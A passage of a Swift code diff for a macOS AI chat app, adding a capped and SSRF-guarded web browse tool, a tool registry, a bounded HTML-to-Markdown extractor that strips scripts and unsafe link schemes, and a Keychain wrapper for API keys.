+    /// cross the ``withDeadline`` task-group boundary. `URLResponse` is safe to
+    /// hand across here: it is fully materialised and we only read it.
+    struct RawResponse: @unchecked Sendable {
+        let data: Data
+        let response: URLResponse
+    }
+
+    /// Stream a request body, aborting once it crosses ``maxResponseBytes``.
+    static func cappedBytes(_ request: URLRequest) async throws -> RawResponse {
+        let (stream, response) = try await session.bytes(for: request)
+        var data = Data()
+        data.reserveCapacity(min(maxResponseBytes, 256 * 1024))
+        for try await byte in stream {
+            if data.count >= maxResponseBytes {
+                throw simpleError("page exceeded \(maxResponseBytes / (1024 * 1024)) MB cap")
+            }
+            data.append(byte)
+        }
+        return RawResponse(data: data, response: response)
+    }
+
+    // MARK: - Render
+
+    /// Decode + render off the main actor. The registry runs tools on
+    /// `@MainActor`, and decoding a large body plus HTML tokenizing is CPU-bound
+    /// (bounded, but not free on a 2 MB page or adversarial markup) — doing it
+    /// inline would block the UI, so it is hopped onto a detached task.
+    static func renderMarkdown(from fetched: Fetched) async -> HTMLToMarkdown.Result {
+        let mime = (fetched.mime ?? "").lowercased()
+        let data = fetched.data
+        let charset = fetched.charset
+        let byteCount = data.count
+        return await Task.detached(priority: .userInitiated) {
+            let text = decode(data, charset: charset)
+            // HTML / XHTML → readability extraction. text/plain, JSON, and
+            // anything else textual → return as-is (still budgeted + cached
+            // downstream). A binary type is near-useless as text; surface a note.
+            if mime.contains("html") || mime.contains("xml") {
+                return HTMLToMarkdown.extract(text)
+            }
+            if mime.isEmpty || mime.hasPrefix("text/") || mime.contains("json") {
+                return HTMLToMarkdown.Result(title: nil, markdown: text)
+            }
+            return HTMLToMarkdown.Result(
+                title: nil,
+                markdown: "[browse: content type '\(mime)' is not text; \(byteCount) bytes not shown]"
+            )
+        }.value
+    }
+
+    /// Decode bytes to a String, honouring a declared charset, then UTF-8, then
+    /// a lossy fallback (never fails — readability tolerates a few replacements).
+    static func decode(_ data: Data, charset: String?) -> String {
+        if let cs = charset?.lowercased() {
+            let enc: String.Encoding?
+            switch cs {
+            case "utf-8", "utf8": enc = .utf8
+            case "iso-8859-1", "latin1", "iso8859-1": enc = .isoLatin1
+            case "windows-1252", "cp1252": enc = .windowsCP1252
+            case "utf-16", "utf16": enc = .utf16
+            case "ascii", "us-ascii": enc = .ascii
+            default: enc = nil
+            }
+            if let enc, let s = String(data: data, encoding: enc) { return s }
+        }
+        if let s = String(data: data, encoding: .utf8) { return s }
+        return String(decoding: data, as: UTF8.self)   // lossy, always succeeds
+    }
+
+    // MARK: - Slice / paginate
+
+    static func sliceResult(
+        tool: String,
+        rawURL: String,
+        entry: BrowseContentCache.Entry,
+        offset: Int,
+        bytesFetched: Int?,
+        cacheExpiresAt: Date? = nil
+    ) -> ToolCallResult {
+        let full = entry.markdown
+        let total = full.count
+        let start = min(max(0, offset), total)
+        var end = min(start + charBudget, total)
+        // Snap the cut back to a line boundary when there's more to come, so a
+        // page doesn't end mid-line. Keep `end` (and thus next_offset) exactly
+        // at the emitted length — no off-by-one in the cursor the model reuses.
+        if end < total {
+            let lower = max(start, end - 500)
+            if let nl = lastNewline(in: full, from: lower, to: end) { end = nl + 1 }
+        }
+        let sliceStart = full.index(full.startIndex, offsetBy: start)
+        let sliceEnd = full.index(full.startIndex, offsetBy: end)
+        let content = String(full[sliceStart..<sliceEnd])
+        let hasMore = end < total
+
+        var payload: [String: Any] = [
+            "url": rawURL,
+            "content": content,
+            "offset": start,
+            "total_chars": total,
+            "has_more": hasMore,
+            "cache_hit": bytesFetched == nil,
+            "fetched_at": entry.fetchedAt.ISO8601Format(),
+        ]
+        if let cacheExpiresAt {
+            payload["cache_expires_at"] = cacheExpiresAt.ISO8601Format()
+        }
+        if let title = entry.title, !title.isEmpty { payload["title"] = title }
+        if entry.finalURL != rawURL { payload["final_url"] = entry.finalURL }
+        if let b = bytesFetched { payload["bytes_fetched"] = b }
+        if hasMore {
+            payload["next_offset"] = end
+            payload["note"] = "Showing characters \(start)–\(end) of \(total). Call browse again with offset=\(end) to continue."
+        } else if start >= total && total > 0 {
+            payload["note"] = "offset \(start) is at or past the end of the \(total)-character page."
+        }
+        return ToolCallResult(toolCallID: "", content: jsonString(payload), isError: false)
+    }
+
+    /// Index of the last "\n" in `full` within [from, to), or nil.
+    private static func lastNewline(in full: String, from: Int, to: Int) -> Int? {
+        guard from < to else { return nil }
+        let lo = full.index(full.startIndex, offsetBy: from)
+        let hi = full.index(full.startIndex, offsetBy: to)
+        var found: Int? = nil
+        var idx = lo
+        var pos = from
+        while idx < hi {
+            if full[idx] == "\n" { found = pos }
+            idx = full.index(after: idx)
+            pos += 1
+        }
+        return found
+    }
+
+    // MARK: - Helpers
+
+    static let userAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) RapidMLX/1.0 Safari/605.1.15"
+
+    static func parseContentType(_ header: String?) -> (mime: String?, charset: String?) {
+        guard let header, !header.isEmpty else { return (nil, nil) }
+        let parts = header.split(separator: ";").map { $0.trimmingCharacters(in: .whitespaces) }
+        let mime = parts.first?.lowercased()
+        var charset: String? = nil
+        for p in parts.dropFirst() where p.lowercased().hasPrefix("charset=") {
+            charset = String(p.dropFirst("charset=".count)).trimmingCharacters(in: CharacterSet(charactersIn: "\"' "))
+        }
+        return (mime, charset)
+    }
+
+    private static func err(_ tool: String, _ message: String) -> ToolCallResult {
+        ToolCallResult(toolCallID: "", content: "\(tool) error: \(message)", isError: true)
+    }
+
+    private static func simpleError(_ message: String) -> NSError {
+        NSError(domain: "RapidBrowse", code: 1, userInfo: [NSLocalizedDescriptionKey: message])
+    }
+
+    static func jsonString(_ payload: [String: Any]) -> String {
+        guard let data = try? JSONSerialization.data(withJSONObject: payload, options: [.sortedKeys]),
+              let s = String(data: data, encoding: .utf8) else {
+            return "{\"error\":\"failed to encode browse result\"}"
+        }
+        return s
+    }
+}
+
+/// Per-task delegate that refuses every automatic redirect so ``BrowseTool``
+/// can follow them by hand, SSRF-validating each target before it connects.
+final class BrowseNoRedirectDelegate: NSObject, URLSessionTaskDelegate, @unchecked Sendable {
+    static let shared = BrowseNoRedirectDelegate()
+    func urlSession(
+        _ session: URLSession,
+        task: URLSessionTask,
+        willPerformHTTPRedirection response: HTTPURLResponse,
+        newRequest request: URLRequest,
+        completionHandler: @escaping (URLRequest?) -> Void
+    ) {
+        completionHandler(nil)   // never auto-follow
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/BuiltinToolRegistry.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BuiltinToolRegistry.swift
@@ -1,0 +1,87 @@
+import Foundation
+
+/// Concrete ``ToolRegistry`` that ships the built-in tools the chat
+/// surface exposes:
+///
+///   * ``weather`` — no approval, hits Open-Meteo over HTTPS
+///   * ``web_search`` — no approval, DuckDuckGo / Brave / Tavily per
+///     ``WebSearchConfig``
+///   * ``browse`` — USER-approved per fetch (``BrowseApprovalStore``),
+///     SSRF-guarded, byte-capped
+///
+/// One instance is constructed by ``RapidApp`` and shared by the chat
+/// view model. Filesystem / shell tools are deliberately absent: this
+/// build has no ``SandboxManager``, and a tool that touches the user's
+/// disk must not ship without one.
+@MainActor
+final class BuiltinToolRegistry: ToolRegistry {
+    /// Per-invocation approval gate for ``browse``. Held on the shared registry
+    /// so the SwiftUI approval dialog + the Settings auto-approve switch bind to
+    /// the same object the tool runner consults.
+    let browseApproval: BrowseApprovalStore
+    /// Which backend ``web_search`` dispatches to + the stored API key. Owned by
+    /// the registry so the chat loop doesn't need to thread a separate
+    /// environment value through every tool call.
+    let webSearch: WebSearchConfig
+
+    init(
+        browseApproval: BrowseApprovalStore = BrowseApprovalStore(),
+        webSearch: WebSearchConfig = WebSearchConfig()
+    ) {
+        self.browseApproval = browseApproval
+        self.webSearch = webSearch
+    }
+
+    var definitions: [ToolDefinition] {
+        [
+            WebSearchTool.definition,
+            BrowseTool.definition,
+            WeatherTool.definition,
+        ]
+    }
+
+    func run(_ call: ToolCall) async -> ToolCallResult {
+        let result: ToolCallResult
+        switch call.function.name {
+        case "web_search":
+            let provider = webSearch.provider
+            let key = webSearch.apiKey(for: provider)
+            result = await WebSearchTool.run(
+                arguments: call.function.arguments,
+                provider: provider,
+                apiKey: key
+            )
+        case "browse":
+            result = await BrowseTool.run(
+                arguments: call.function.arguments,
+                approval: browseApproval
+            )
+        case "weather":
+            result = await WeatherTool.run(arguments: call.function.arguments)
+        default:
+            // The model invented a tool name we don't ship — return an
+            // error result so it gets a chance to recover instead of
+            // throwing and tearing the chat loop down.
+            result = ToolCallResult(
+                toolCallID: call.id,
+                content: "unknown tool '\(call.function.name)' — available: web_search, browse, weather",
+                isError: true
+            )
+        }
+        // The individual tools don't know the toolCallID at run time, so
+        // fill it in here. Classification is centralised at this boundary:
+        // raw content continues to the model, but the transcript gets only a
+        // stable diagnosis.
+        let failureKind = result.failureKind ?? FailureDiagnoser.toolFailureKind(
+            toolName: call.function.name,
+            content: result.content,
+            isError: result.isError
+        )
+        return ToolCallResult(
+            toolCallID: call.id,
+            content: result.content,
+            isError: result.isError || failureKind != nil,
+            failureKind: failureKind
+        )
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/HTMLToMarkdown.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/HTMLToMarkdown.swift
@@ -1,0 +1,506 @@
+import Foundation
+
+/// Converts an HTML document into readable Markdown for the ``browse`` tool.
+///
+/// This is a pragmatic "readability-lite" extractor, not a full
+/// Mozilla-Readability port: it drops non-content elements (script / style /
+/// nav chrome), prefers the main article region when the page marks one, and
+/// linearises the remaining block/inline structure into Markdown the model can
+/// read. It is intentionally a single linear tokenizer (no regex over HTML, no
+/// DOM) so its behaviour on malformed / adversarial markup is bounded and
+/// predictable: unknown tags degrade to their text, unbalanced tags can't
+/// crash it, and there is no backtracking to blow up on pathological input.
+enum HTMLToMarkdown {
+    /// Hard cap on the HTML we will process, independent of the fetch byte cap,
+    /// so a pathological document can't pin the CPU in the tokenizer.
+    static let maxInputChars = 4_000_000
+
+    /// Max characters ``parseTagAt`` will scan for a single tag's closing `>`.
+    /// Bounds each parse to O(1)-ish so the tokenizer stays O(n): without it, an
+    /// unterminated `<` scans to EOF, and callers that advance by one character
+    /// after a failed parse would re-scan the tail for every `<` — O(n²) on a
+    /// body like a long run of `<a` with no `>`. A real tag is far shorter than
+    /// this; a longer "tag" is treated as literal text.
+    static let maxTagScan = 8192
+
+    struct Result {
+        let title: String?
+        let markdown: String
+    }
+
+    static func extract(_ html: String) -> Result {
+        let capped = html.count > maxInputChars ? String(html.prefix(maxInputChars)) : html
+        let title = extractTitle(capped)
+        // Raw-text + hidden elements first (their bodies are NOT parsed as HTML,
+        // so they must be removed by literal open→close scanning before the tag
+        // tokenizer runs).
+        var cleaned = stripComments(capped)
+        for tag in ["script", "style", "noscript", "svg", "head", "template", "iframe"] {
+            cleaned = stripElement(tag, in: cleaned)
+        }
+        // Focus on the main content region when the page marks one; this is what
+        // drops most nav / header / footer / sidebar boilerplate.
+        let region = mainRegion(cleaned)
+        var tokenizer = Tokenizer(Array(region))
+        let md = tokenizer.render()
+        return Result(title: title, markdown: normalizeWhitespace(md))
+    }
+
+    // MARK: - Region selection
+
+    /// Inner HTML of the first `<article>` or `<main>`, else `<body>`, else the
+    /// whole (already-cleaned) document.
+    static func mainRegion(_ html: String) -> String {
+        for tag in ["article", "main", "body"] {
+            if let inner = firstElementInner(tag, in: html), !inner.isEmpty {
+                return inner
+            }
+        }
+        return html
+    }
+
+    /// Inner HTML of the first `<tag …>…</tag>`, tracking nesting depth so a
+    /// nested same-named element doesn't close the region early. Case-insensitive.
+    static func firstElementInner(_ tag: String, in html: String) -> String? {
+        let chars = Array(html)
+        let lower = tag.lowercased()
+        guard let open = findTag(lower, closing: false, in: chars, from: 0) else { return nil }
+        var depth = 1
+        var cursor = open.end
+        while cursor < chars.count {
+            guard let next = findAnyTag(named: lower, in: chars, from: cursor) else { break }
+            if next.closing {
+                depth -= 1
+                if depth == 0 {
+                    return String(chars[open.end..<next.start])
+                }
+            } else if !next.selfClosing {
+                depth += 1
+            }
+            cursor = next.end
+        }
+        return nil
+    }
+
+    private struct TagHit { let start: Int; let end: Int; let closing: Bool; let selfClosing: Bool }
+
+    /// Find the next `<name …>` (or `</name>`) occurrence at/after `from`.
+    private static func findAnyTag(named name: String, in chars: [Character], from: Int) -> TagHit? {
+        var i = from
+        while i < chars.count {
+            if chars[i] == "<" {
+                if let hit = parseTagAt(i, in: chars), hit.name == name {
+                    return TagHit(start: i, end: hit.end, closing: hit.closing, selfClosing: hit.selfClosing)
+                }
+                // Skip past this tag (or lone '<').
+                if let hit = parseTagAt(i, in: chars) { i = hit.end } else { i += 1 }
+            } else {
+                i += 1
+            }
+        }
+        return nil
+    }
+
+    private static func findTag(_ name: String, closing: Bool, in chars: [Character], from: Int) -> (start: Int, end: Int)? {
+        var i = from
+        while i < chars.count {
+            if chars[i] == "<", let hit = parseTagAt(i, in: chars), hit.name == name, hit.closing == closing {
+                return (i, hit.end)
+            }
+            i += 1
+        }
+        return nil
+    }
+
+    // MARK: - Comment / element stripping
+
+    static func stripComments(_ html: String) -> String {
+        var out = ""
+        out.reserveCapacity(html.count)
+        let chars = Array(html)
+        var i = 0
+        while i < chars.count {
+            if chars[i] == "<", i + 3 < chars.count, chars[i+1] == "!", chars[i+2] == "-", chars[i+3] == "-" {
+                // Scan to the closing "-->".
+                var j = i + 4
+                while j + 2 < chars.count && !(chars[j] == "-" && chars[j+1] == "-" && chars[j+2] == ">") {
+                    j += 1
+                }
+                i = (j + 2 < chars.count) ? j + 3 : chars.count
+            } else {
+                out.append(chars[i])
+                i += 1
+            }
+        }
+        return out
+    }
+
+    /// Remove every `<tag …>…</tag>` (raw-text / hidden element) by literal
+    /// scanning. Case-insensitive; tolerant of a missing close tag (drops to EOF).
+    static func stripElement(_ tag: String, in html: String) -> String {
+        let chars = Array(html)
+        let lower = tag.lowercased()
+        var out = ""
+        out.reserveCapacity(chars.count)
+        var i = 0
+        while i < chars.count {
+            if chars[i] == "<", let hit = parseTagAt(i, in: chars), hit.name == lower, !hit.closing {
+                if hit.selfClosing {
+                    i = hit.end
+                    continue
+                }
+                // Skip until the matching close tag (no nesting for raw-text
+                // elements; first close wins).
+                if let close = findTag(lower, closing: true, in: chars, from: hit.end) {
+                    i = close.end
+                } else {
+                    i = chars.count
+                }
+            } else {
+                out.append(chars[i])
+                i += 1
+            }
+        }
+        return out
+    }
+
+    static func extractTitle(_ html: String) -> String? {
+        let chars = Array(html)
+        guard let open = findTag("title", closing: false, in: chars, from: 0),
+              let close = findTag("title", closing: true, in: chars, from: open.end),
+              open.end <= close.start else { return nil }
+        let raw = String(chars[open.end..<close.start])
+        let decoded = decodeEntities(raw).trimmingCharacters(in: .whitespacesAndNewlines)
+        return decoded.isEmpty ? nil : collapseSpaces(decoded)
+    }
+
+    // MARK: - Tag parsing
+
+    private struct ParsedTag { let name: String; let closing: Bool; let selfClosing: Bool; let attributes: String; let end: Int }
+
+    /// Parse a tag starting at `chars[i] == '<'`. Reads to the terminating `>`,
+    /// honouring quotes so a `>` inside an attribute value doesn't end it early.
+    /// Returns nil for a lone `<` or a `<!`/`<?` directive.
+    private static func parseTagAt(_ i: Int, in chars: [Character]) -> ParsedTag? {
+        guard i < chars.count, chars[i] == "<" else { return nil }
+        var j = i + 1
+        guard j < chars.count else { return nil }
+        var closing = false
+        if chars[j] == "/" { closing = true; j += 1 }
+        // A name must start with an ASCII letter; otherwise it's `<!`, `<?`, or a
+        // stray '<' in text.
+        guard j < chars.count, chars[j].isASCIILetter else { return nil }
+        var name = ""
+        while j < chars.count, chars[j].isASCIILetter || chars[j].isNumber || chars[j] == "-" {
+            name.append(chars[j]); j += 1
+        }
+        // Scan to the terminating '>', tracking quotes, with INDEX-ONLY work (no
+        // per-char string building) so an unterminated tag costs only the scan,
+        // not an allocation. Bounded two ways so a malformed tag can't force an
+        // O(n) scan (and thus O(n²) overall when every '<' in a malformed body
+        // restarts one): a bare unquoted '<' means this is not a well-formed tag
+        // — a real tag never contains one — and a tag that runs past
+        // ``maxTagScan`` characters without a closing '>' is likewise treated as
+        // literal text. Both return nil, and the caller then advances a single
+        // character into the just-scanned run, so total work stays linear. The
+        // `attributes` string is materialised only once a real `>` is found.
+        let attrStart = j
+        var quote: Character? = nil
+        let scanLimit = min(chars.count, j + maxTagScan)
+        var closeIndex: Int? = nil
+        while j < scanLimit {
+            let ch = chars[j]
+            if let q = quote {
+                if ch == q { quote = nil }
+            } else if ch == "\"" || ch == "'" {
+                quote = ch
+            } else if ch == ">" {
+                closeIndex = j
+                break
+            } else if ch == "<" {
+                return nil   // bare '<' inside a tag → malformed, treat as text
+            }
+            j += 1
+        }
+        guard let close = closeIndex else { return nil }   // no closing '>' (or hit cap)
+        let attrs = String(chars[attrStart..<close])
+        let selfClosing = attrs.hasSuffix("/")
+        return ParsedTag(name: name.lowercased(), closing: closing, selfClosing: selfClosing, attributes: attrs, end: close + 1)
+    }
+
+    private static func attribute(_ key: String, in attrs: String) -> String? {
+        // Linear scan for `key = "…"` / `key='…'` / `key=token`, case-insensitive
+        // key. Good enough for href/src/alt; not a spec HTML attribute parser.
+        let lowerAttrs = attrs.lowercased()
+        let lowerKey = key.lowercased()
+        var searchStart = lowerAttrs.startIndex
+        while let r = lowerAttrs.range(of: lowerKey, range: searchStart..<lowerAttrs.endIndex) {
+            // Must be at a token boundary (preceded by whitespace or start).
+            let before = r.lowerBound == lowerAttrs.startIndex ? " " : lowerAttrs[lowerAttrs.index(before: r.lowerBound)]
+            var k = r.upperBound
+            // Skip spaces before '='.
+            while k < lowerAttrs.endIndex, lowerAttrs[k] == " " { k = lowerAttrs.index(after: k) }
+            if (before == " " || before == "\t" || before == "\n" || before == "\r"),
+               k < lowerAttrs.endIndex, lowerAttrs[k] == "=" {
+                // Map back into the ORIGINAL-case string at the same offset.
+                let valOffset = lowerAttrs.distance(from: lowerAttrs.startIndex, to: lowerAttrs.index(after: k))
+                let value = attrValue(from: attrs, startingAt: valOffset)
+                return value
+            }
+            searchStart = r.upperBound
+        }
+        return nil
+    }
+
+    private static func attrValue(from attrs: String, startingAt offset: Int) -> String {
+        let arr = Array(attrs)
+        var i = offset
+        while i < arr.count, arr[i] == " " { i += 1 }
+        guard i < arr.count else { return "" }
+        if arr[i] == "\"" || arr[i] == "'" {
+            let q = arr[i]; i += 1
+            var out = ""
+            while i < arr.count, arr[i] != q { out.append(arr[i]); i += 1 }
+            return decodeEntities(out)
+        }
+        var out = ""
+        while i < arr.count, arr[i] != " ", arr[i] != "\t", arr[i] != "\n", arr[i] != "\r", arr[i] != ">" {
+            out.append(arr[i]); i += 1
+        }
+        return decodeEntities(out)
+    }
+
+    // MARK: - Tokenizer → Markdown
+
+    private struct Tokenizer {
+        let chars: [Character]
+        var out = ""
+        var inPre = false
+        var linkHrefStack: [String] = []
+        var listDepth = 0
+
+        init(_ chars: [Character]) {
+            self.chars = chars
+            out.reserveCapacity(chars.count)
+        }
+
+        mutating func render() -> String {
+            var i = 0
+            var textBuf = ""
+            func flushText() {
+                guard !textBuf.isEmpty else { return }
+                let decoded = decodeEntities(textBuf)
+                out += inPre ? decoded : collapseSpaces(decoded)
+                textBuf = ""
+            }
+            while i < chars.count {
+                if chars[i] == "<", let tag = HTMLToMarkdown.parseTagAt(i, in: chars) {
+                    flushText()
+                    emit(tag)
+                    i = tag.end
+                } else {
+                    textBuf.append(chars[i])
+                    i += 1
+                }
+            }
+            flushText()
+            return out
+        }
+
+        private mutating func newlineBlock() {
+            // Ensure a blank line before the next block, without piling up.
+            if inPre { out += "\n"; return }
+            while out.hasSuffix("\n\n\n") { out.removeLast() }
+            if !out.isEmpty && !out.hasSuffix("\n\n") {
+                out += out.hasSuffix("\n") ? "\n" : "\n\n"
+            }
+        }
+
+        private mutating func emit(_ tag: HTMLToMarkdown.ParsedTag) {
+            switch tag.name {
+            case "br":
+                out += "\n"
+            case "hr":
+                newlineBlock(); out += "---"; newlineBlock()
+            case "p", "div", "section", "article", "main", "header", "footer",
+                 "aside", "nav", "table", "figure", "figcaption", "dl", "dd", "dt":
+                newlineBlock()
+            case "h1", "h2", "h3", "h4", "h5", "h6":
+                if tag.closing { newlineBlock() }
+                else {
+                    newlineBlock()
+                    let level = Int(String(tag.name.dropFirst())) ?? 1
+                    out += String(repeating: "#", count: level) + " "
+                }
+            case "ul", "ol":
+                if tag.closing { listDepth = max(0, listDepth - 1) }
+                else { listDepth += 1 }
+                newlineBlock()
+            case "li":
+                if !tag.closing {
+                    if !out.hasSuffix("\n") { out += "\n" }
+                    out += String(repeating: "  ", count: max(0, listDepth - 1)) + "- "
+                }
+            case "blockquote":
+                newlineBlock(); if !tag.closing { out += "> " }
+            case "tr":
+                if tag.closing { out += "\n" }
+            case "td", "th":
+                if tag.closing { out += " | " }
+            case "pre":
+                if tag.closing { inPre = false; out += "\n```"; newlineBlock() }
+                else { newlineBlock(); out += "```\n"; inPre = true }
+            case "code":
+                if !inPre { out += "`" }
+            case "strong", "b":
+                out += "**"
+            case "em", "i":
+                out += "*"
+            case "a":
+                if tag.closing {
+                    let href = linkHrefStack.popLast() ?? ""
+                    if href.isEmpty { /* nothing to link */ }
+                    else { out += "](\(href))" }
+                } else {
+                    let href = (HTMLToMarkdown.attribute("href", in: tag.attributes) ?? "").trimmingCharacters(in: .whitespaces)
+                    // Only linkify safe, real destinations; drop javascript:/data:
+                    // and fragment/empty hrefs to plain text.
+                    if isSafeHref(href) { out += "["; linkHrefStack.append(href) }
+                    else { linkHrefStack.append("") }
+                }
+            case "img":
+                let alt = (HTMLToMarkdown.attribute("alt", in: tag.attributes) ?? "").trimmingCharacters(in: .whitespaces)
+                let src = (HTMLToMarkdown.attribute("src", in: tag.attributes) ?? "").trimmingCharacters(in: .whitespaces)
+                if isSafeHref(src) && !alt.isEmpty { out += "![\(alt)](\(src))" }
+                else if !alt.isEmpty { out += "[image: \(alt)]" }
+            default:
+                break   // unknown/inline tag → contributes only its text
+            }
+        }
+
+        private func isSafeHref(_ href: String) -> Bool {
+            guard !href.isEmpty, !href.hasPrefix("#") else { return false }
+            let lower = href.lowercased()
+            if lower.hasPrefix("javascript:") || lower.hasPrefix("data:") || lower.hasPrefix("vbscript:") {
+                return false
+            }
+            return true
+        }
+    }
+
+    // MARK: - Text helpers
+
+    /// Collapse any run of ASCII whitespace to a single space (non-pre text).
+    static func collapseSpaces(_ s: String) -> String {
+        var out = ""
+        out.reserveCapacity(s.count)
+        var lastWasSpace = false
+        for ch in s {
+            if ch == " " || ch == "\t" || ch == "\n" || ch == "\r" {
+                if !lastWasSpace { out.append(" "); lastWasSpace = true }
+            } else {
+                out.append(ch); lastWasSpace = false
+            }
+        }
+        return out
+    }
+
+    /// Final pass: trim trailing spaces per line, collapse 3+ blank lines to a
+    /// single blank line, and trim leading/trailing blank lines.
+    static func normalizeWhitespace(_ s: String) -> String {
+        var lines = s.components(separatedBy: "\n").map { line -> String in
+            var l = line
+            while l.hasSuffix(" ") || l.hasSuffix("\t") { l.removeLast() }
+            return l
+        }
+        // Collapse runs of >1 blank line.
+        var collapsed: [String] = []
+        var blankRun = 0
+        for l in lines {
+            if l.isEmpty {
+                blankRun += 1
+                if blankRun <= 1 { collapsed.append(l) }
+            } else {
+                blankRun = 0
+                collapsed.append(l)
+            }
+        }
+        lines = collapsed
+        while lines.first?.isEmpty == true { lines.removeFirst() }
+        while lines.last?.isEmpty == true { lines.removeLast() }
+        return lines.joined(separator: "\n")
+    }
+
+    /// Decode the HTML entities that actually show up in body text. Named set is
+    /// the common web subset; numeric `&#nnn;` / `&#xhhh;` are fully supported.
+    static func decodeEntities(_ s: String) -> String {
+        guard s.contains("&") else { return s }
+        var out = ""
+        out.reserveCapacity(s.count)
+        let chars = Array(s)
+        var i = 0
+        while i < chars.count {
+            guard chars[i] == "&" else { out.append(chars[i]); i += 1; continue }
+            // Find the terminating ';' within a small window.
+            var j = i + 1
+            let limit = min(chars.count, i + 12)
+            while j < limit, chars[j] != ";" { j += 1 }
+            guard j < chars.count, chars[j] == ";" else { out.append("&"); i += 1; continue }
+            let name = String(chars[(i+1)..<j])
+            if let decoded = decodeOneEntity(name) {
+                out.append(decoded)
+                i = j + 1
+            } else {
+                out.append("&"); i += 1
+            }
+        }
+        return out
+    }
+
+    private static func decodeOneEntity(_ name: String) -> Character? {
+        if name.hasPrefix("#") {
+            let numPart = name.dropFirst()
+            let value: UInt32?
+            if numPart.hasPrefix("x") || numPart.hasPrefix("X") {
+                value = UInt32(numPart.dropFirst(), radix: 16)
+            } else {
+                value = UInt32(numPart, radix: 10)
+            }
+            if let v = value, let scalar = Unicode.Scalar(v) { return Character(scalar) }
+            return nil
+        }
+        switch name {
+        case "amp": return "&"
+        case "lt": return "<"
+        case "gt": return ">"
+        case "quot": return "\""
+        case "apos": return "'"
+        case "nbsp": return "\u{00A0}"
+        case "copy": return "\u{00A9}"
+        case "reg": return "\u{00AE}"
+        case "trade": return "\u{2122}"
+        case "hellip": return "\u{2026}"
+        case "mdash": return "\u{2014}"
+        case "ndash": return "\u{2013}"
+        case "lsquo": return "\u{2018}"
+        case "rsquo": return "\u{2019}"
+        case "ldquo": return "\u{201C}"
+        case "rdquo": return "\u{201D}"
+        case "middot": return "\u{00B7}"
+        case "bull": return "\u{2022}"
+        case "deg": return "\u{00B0}"
+        case "euro": return "\u{20AC}"
+        case "pound": return "\u{00A3}"
+        case "cent": return "\u{00A2}"
+        case "times": return "\u{00D7}"
+        case "divide": return "\u{00F7}"
+        default: return nil
+        }
+    }
+}
+
+private extension Character {
+    var isASCIILetter: Bool {
+        return (self >= "a" && self <= "z") || (self >= "A" && self <= "Z")
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/KeychainStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/KeychainStore.swift
@@ -1,0 +1,118 @@
+import Foundation
+import Security
+
+/// Minimal Keychain wrapper for storing per-provider API keys.
+///
+/// We deliberately model the surface as a protocol so the test
+/// suite can swap in an in-memory implementation rather than
+/// touching the real system Keychain (which would prompt on
+/// access, leak across test runs, and require manual cleanup).
+protocol KeychainStoring: Sendable {
+    func read(account: String) -> String?
+    @discardableResult func write(account: String, secret: String) -> Bool
+    @discardableResult func delete(account: String) -> Bool
+}
+
+/// Real-system implementation. Each entry is a ``kSecClassGenericPassword``
+/// keyed by ``service = SystemKeychain.service`` + ``account``. We
+/// use the generic-password class (not internet-password) because
+/// Brave/Tavily keys are static credentials, not per-URL secrets.
+///
+/// Codex audit batch 6 finding (KeychainStore.swift:63, P2):
+/// access policy is ``kSecAttrAccessibleWhenUnlockedThisDeviceOnly``.
+/// The pre-audit shape used ``kSecAttrAccessibleAfterFirstUnlock``,
+/// which (a) makes the key readable while the machine is locked
+/// after the user's first post-boot login (any background process
+/// running under the user account can read it) and (b) allows the
+/// secret to be migrated off-device via Keychain sync / Time
+/// Machine restore. ``WhenUnlockedThisDeviceOnly`` keeps the secret
+/// readable only while the screen is unlocked and only on the
+/// originating Mac.
+struct SystemKeychain: KeychainStoring {
+    static let service = "com.rapidmlx.rapid.api-keys"
+
+    func read(account: String) -> String? {
+        let query: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: Self.service,
+            kSecAttrAccount as String: account,
+            kSecReturnData as String: true,
+            kSecMatchLimit as String: kSecMatchLimitOne,
+        ]
+        var item: AnyObject?
+        let status = SecItemCopyMatching(query as CFDictionary, &item)
+        guard status == errSecSuccess,
+              let data = item as? Data,
+              let value = String(data: data, encoding: .utf8) else {
+            return nil
+        }
+        return value
+    }
+
+    @discardableResult
+    func write(account: String, secret: String) -> Bool {
+        guard let data = secret.data(using: .utf8) else { return false }
+        let baseQuery: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: Self.service,
+            kSecAttrAccount as String: account,
+        ]
+        // Try update first; if there's no existing item, fall
+        // through to add. This is the canonical pattern for
+        // "upsert" against the Keychain API. Update also bumps
+        // the accessibility class so a pre-existing item written
+        // with the prior (weaker) policy migrates forward on the
+        // first write.
+        let updateAttrs: [String: Any] = [
+            kSecValueData as String: data,
+            kSecAttrAccessible as String: kSecAttrAccessibleWhenUnlockedThisDeviceOnly,
+        ]
+        let updateStatus = SecItemUpdate(baseQuery as CFDictionary, updateAttrs as CFDictionary)
+        if updateStatus == errSecSuccess { return true }
+        if updateStatus != errSecItemNotFound { return false }
+
+        var addQuery = baseQuery
+        addQuery[kSecValueData as String] = data
+        addQuery[kSecAttrAccessible as String] = kSecAttrAccessibleWhenUnlockedThisDeviceOnly
+        let addStatus = SecItemAdd(addQuery as CFDictionary, nil)
+        return addStatus == errSecSuccess
+    }
+
+    @discardableResult
+    func delete(account: String) -> Bool {
+        let query: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: Self.service,
+            kSecAttrAccount as String: account,
+        ]
+        let status = SecItemDelete(query as CFDictionary)
+        return status == errSecSuccess || status == errSecItemNotFound
+    }
+}
+
+/// In-memory backing for tests. Same surface as ``SystemKeychain``
+/// but everything lives in a dictionary that dies with the
+/// instance — no system-Keychain side effects, no popups, no
+/// cross-test pollution. Thread-safe via a serial DispatchQueue
+/// because the tool dispatcher may call into it from background
+/// actor hops.
+final class InMemoryKeychain: KeychainStoring, @unchecked Sendable {
+    private var storage: [String: String] = [:]
+    private let queue = DispatchQueue(label: "rapid.in-memory-keychain")
+
+    func read(account: String) -> String? {
+        queue.sync { storage[account] }
+    }
+
+    @discardableResult
+    func write(account: String, secret: String) -> Bool {
